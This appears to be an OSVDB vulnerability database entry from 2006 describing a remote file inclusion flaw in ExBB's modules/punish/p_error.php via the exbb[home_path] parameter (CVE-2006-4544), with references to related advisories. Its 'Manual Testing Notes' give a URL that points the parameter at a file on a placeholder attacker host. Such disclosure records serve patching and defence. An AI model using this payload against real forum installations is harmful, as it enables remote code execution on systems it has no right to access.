ExBB p_error.php exbb[home_path] Variable Remote File Inclusion

2006-08-30T23:06:11
ID OSVDB:29877
Type osvdb
Reporter OSVDB
Modified 2006-08-30T23:06:11

Description

Manual Testing Notes

http://[target]/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://[attacker]/inject.txt?

References:

Vendor URL: http://www.exbb.net/
Security Tracker: 1016773
Related OSVDB ID: 29878
Related OSVDB ID: 29876
Related OSVDB ID: 29874
Related OSVDB ID: 29873
Related OSVDB ID: 29875
Related OSVDB ID: 29879
Other Advisory URL: http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0553.html
Keyword: ECHO_ADV_4606
CVE-2006-4544